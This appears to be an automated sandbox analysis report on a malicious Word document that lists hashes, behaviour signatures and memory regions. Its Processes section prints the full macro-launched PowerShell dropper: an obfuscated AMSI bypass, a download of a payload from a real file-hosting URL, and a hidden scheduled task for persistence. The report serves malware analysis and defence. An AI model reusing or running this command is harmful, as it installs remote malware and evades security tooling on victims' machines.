Analysis

  • max time kernel
    118s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    10/04/2024, 11:05

General

  • Target

    57fa6b0245f3a5009e57da1d0cac9466f07e61bf37db7d3c9f59eee2ce4db1e7.doc

  • Size

    385KB

  • MD5

    18889d70d5546b861c6fa4ec11126942

  • SHA1

    eef7ed8bd9bcee074e917cf295badf9ad5de936f

  • SHA256

    57fa6b0245f3a5009e57da1d0cac9466f07e61bf37db7d3c9f59eee2ce4db1e7

  • SHA512

    3c29433131e3a039eccbe459a56042e639c39700caaa2c8d7bffa7bb61021f14c8bf58ccbabb5a4a4a8fb056e5c086b13aaea7464d2c9cc6f1d74cada2cd2646

  • SSDEEP

    6144:55fBfm2t8aGhy50K+gGm7R82m4FX36pr0Ko2:5Xm2tVGhy50O7K2D9Ku

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.4sync.com/web/directDownload/nJJrbwEJ/rHb0lMWD.782eb24360173e96058a01a45c67031e

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\57fa6b0245f3a5009e57da1d0cac9466f07e61bf37db7d3c9f59eee2ce4db1e7.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe systeminfo; [Ref].Assembly.GetType('system.Management.Automation.'+$([Text.encoding]::Unicode.Getstring([Convert]::FromBase64string('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.encoding]::Unicode.Getstring([Convert]::FromBase64string('YQBtAHMAaQBJAG4AaQB0AeYAYQBpAGwAZQBkAA=='))),'NonPublic,static').setValue($null,$true); (New-Object system.Net.WebClient).DownloadFile('https://www.4sync.com/web/directDownload/nJJrbwEJ/rHb0lMWD.782eb24360173e96058a01a45c67031e', 'C:\Users\Public\WindowsAuthKeys.ps1'); schtasks /create /tn MicrosoftEdgeTask /st 00:00 /du 9999:59 /sc once /ri 10 /f /tr 'powershell.exe -Windowstyle hidden -executionPolicy Bypass -File "C:\Users\Public\WindowsAuthKeys.ps1"'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\systeminfo.exe
        "C:\Windows\system32\systeminfo.exe"
        3⤵
        • Gathers system information
        PID:1672
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /tn MicrosoftEdgeTask /st 00:00 /du 9999:59 /sc once /ri 10 /f /tr "powershell.exe -Windowstyle hidden -executionPolicy Bypass -File C:\Users\Public\WindowsAuthKeys.ps1"
        3⤵
        • Creates scheduled task(s)
        PID:2296
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1428

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            aa50cb5a00042bb3ac9cd911e8843414

            SHA1

            96585d2727e1007c86d62ca82ab28f23f8e49653

            SHA256

            a938d2af3ac3bb1fa83c44961fb62484a5538e66e228f79637307a237566c669

            SHA512

            acf889cf56639217a386aad94e1fb9a988449d966d5d6edb4cad9230f6075e515ca8e702efe74c7c71433d0450c9b4a8e60535ece0a0d69738f562f8a40f9003

          • memory/2240-94-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-188-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-5-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-7-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-6-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-9-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-10-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-8-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-11-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-13-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-12-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-14-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-16-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-15-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-95-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-96-0x0000000006B60000-0x0000000006C60000-memory.dmp

            Filesize

            1024KB

          • memory/2240-100-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-104-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-106-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-187-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-191-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-195-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-196-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-194-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-193-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-192-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-190-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-189-0x0000000006B60000-0x0000000006C60000-memory.dmp

            Filesize

            1024KB

          • memory/2240-0-0x000000002F401000-0x000000002F402000-memory.dmp

            Filesize

            4KB

          • memory/2240-186-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-185-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-184-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-105-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-103-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-102-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-101-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-99-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-98-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-2-0x0000000070D2D000-0x0000000070D38000-memory.dmp

            Filesize

            44KB

          • memory/2240-97-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-369-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-279-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-283-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-286-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-285-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-284-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-282-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-365-0x0000000006B60000-0x0000000006C60000-memory.dmp

            Filesize

            1024KB

          • memory/2240-364-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-281-0x0000000006B60000-0x0000000006C60000-memory.dmp

            Filesize

            1024KB

          • memory/2240-280-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-278-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-277-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-276-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-274-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-368-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-372-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-375-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-376-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-374-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-373-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-371-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-370-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-275-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-367-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-366-0x00000000003B0000-0x00000000004B0000-memory.dmp

            Filesize

            1024KB

          • memory/2240-479-0x0000000070D2D000-0x0000000070D38000-memory.dmp

            Filesize

            44KB

          • memory/2240-481-0x0000000006B60000-0x0000000006C60000-memory.dmp

            Filesize

            1024KB

          • memory/2240-482-0x0000000006B60000-0x0000000006C60000-memory.dmp

            Filesize

            1024KB

          • memory/2240-483-0x0000000006B60000-0x0000000006C60000-memory.dmp

            Filesize

            1024KB

          • memory/2240-484-0x0000000006B60000-0x0000000006C60000-memory.dmp

            Filesize

            1024KB

          • memory/2240-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2240-499-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2240-500-0x0000000070D2D000-0x0000000070D38000-memory.dmp

            Filesize

            44KB

          • memory/2480-457-0x000000006A7C0000-0x000000006AD6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2480-458-0x00000000027E0000-0x0000000002820000-memory.dmp

            Filesize

            256KB

          • memory/2480-459-0x000000006A7C0000-0x000000006AD6B000-memory.dmp

            Filesize

            5.7MB

          • memory/2480-460-0x00000000027E0000-0x0000000002820000-memory.dmp

            Filesize

            256KB

          • memory/2480-478-0x000000006A7C0000-0x000000006AD6B000-memory.dmp

            Filesize

            5.7MB